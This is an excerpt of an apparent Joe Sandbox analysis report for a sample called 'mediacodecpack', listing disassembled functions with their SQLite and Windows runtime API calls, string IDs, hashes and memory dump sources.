                                                                                • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                • String ID: offsets
                                                                                • API String ID: 463808202-2642679573
                                                                                • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                • String ID:
                                                                                • API String ID: 2903785150-0
                                                                                • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03428
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D0346B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D03472
                                                                                • GetLastError.KERNEL32 ref: 02D03486
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D034D7
                                                                                • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D034ED
                                                                                • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D03518
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                • String ID: CancelIoEx$KERNEL32
                                                                                • API String ID: 2902213904-434325024
                                                                                • Opcode ID: 96de5521ab4d92d84a84856ae25b84e9247c16f4c78de8f5869bbcc9ccbb93d0
                                                                                • Instruction ID: a6d67598b761beeb24e8ea19e66200545f5e8eef8fe63164a26bfede3f7672be
                                                                                • Opcode Fuzzy Hash: 96de5521ab4d92d84a84856ae25b84e9247c16f4c78de8f5869bbcc9ccbb93d0
                                                                                • Instruction Fuzzy Hash: C331ABB1900215DFDB21AF64D894BAA7BB8FF59320F1184A9E8159B3A0CB70DD04CFA1
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                • String ID:
                                                                                • API String ID: 3556715608-0
                                                                                • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403EF1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408574,?,004085C4,?,?,?,Runtime Error!Program: ), ref: 004060FA
                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406112
                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406123
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406130
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                • API String ID: 2238633743-4044615076
                                                                                • Opcode ID: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                • Instruction ID: 36fb3fed3a384cff097ea3fb9e63704b9da04faa094e7ece228342700e77c082
                                                                                • Opcode Fuzzy Hash: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                • Instruction Fuzzy Hash: E5018431700211DBC7109FB59FC0A177BE99A997C0712093FB646FA2A3DA7C88158FAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                • API String ID: 0-780898
                                                                                • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                • API String ID: 0-2604012851
                                                                                • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,00000100,00408640,00000001,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 00406409
                                                                                • LCMapStringA.KERNEL32(00000000,00000100,0040863C,00000001,00000000,00000000,?,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406425
                                                                                • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405E87,?,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 0040646E
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 004064A6
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004064FE
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 00406514
                                                                                • LCMapStringW.KERNEL32(00000000,?,00405E87,00000000,00405E87,?,?,00405E87,00200020,00000000,?,00000000), ref: 00406547
                                                                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004065AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: String$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 352835431-0
                                                                                • Opcode ID: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                • Instruction ID: d42c4ff00bdcea80f115aa50461d5d245c16a81543514470c81a73783c2cd3a2
                                                                                • Opcode Fuzzy Hash: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                • Instruction Fuzzy Hash: 4A517B71900209FFCF229F58DD49A9F7BB9FB48750F11413AF912B12A0D7398961DBA8
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                  • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                  • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                • String ID: |
                                                                                • API String ID: 1576672187-2343686810
                                                                                • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                APIs
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                  • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                • API String ID: 652164897-1572359634
                                                                                • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E3A
                                                                                • GetStdHandle.KERNEL32(000000F4,00408574,00000000,?,00000000,00000000), ref: 00403F10
                                                                                • WriteFile.KERNEL32(00000000), ref: 00403F17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandleModuleNameWrite
                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                • API String ID: 3784150691-4022980321
                                                                                • Opcode ID: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
                                                                                • Instruction ID: 1325ef8c40c3fac29ee6baa2b36e74f90486e8040fe1898f7fb10d69898ee010
                                                                                • Opcode Fuzzy Hash: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
                                                                                • Instruction Fuzzy Hash: 3331C172A002186FDF24EA60DE4AFEA776CAB45304F10057FF584F61D1DAB8AE448A5D
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                • String ID:
                                                                                • API String ID: 2352520524-0
                                                                                • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                APIs
                                                                                  • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                  • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                  • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                  • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                  • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                  • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                  • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                • String ID: optimize
                                                                                • API String ID: 3659050757-3797040228
                                                                                • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                APIs
                                                                                • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                  • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                  • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                • sqlite3_free.SQLITE3 ref: 60964783
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                • String ID:
                                                                                • API String ID: 571598680-0
                                                                                • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040372D
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 00403741
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040376D
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037A5
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037C7
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037E0
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 004037F3
                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403831
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1823725401-0
                                                                                • Opcode ID: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
                                                                                • Instruction ID: 45b108152198534a65e95edcfca0b8ba0a54c8eec5aa0c4c05c1d64ec2385aa0
                                                                                • Opcode Fuzzy Hash: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
                                                                                • Instruction Fuzzy Hash: 2131D2F35082619ED7203F745DC483BBE9CEA4530A715453FF981F3280DA795D4286A9
                                                                                APIs
                                                                                • OpenEventA.KERNEL32(00100002,00000000,00000000,5304F1C2), ref: 02D106C0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D106D5
                                                                                • ResetEvent.KERNEL32(00000000,5304F1C2), ref: 02D106DF
                                                                                • CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10714
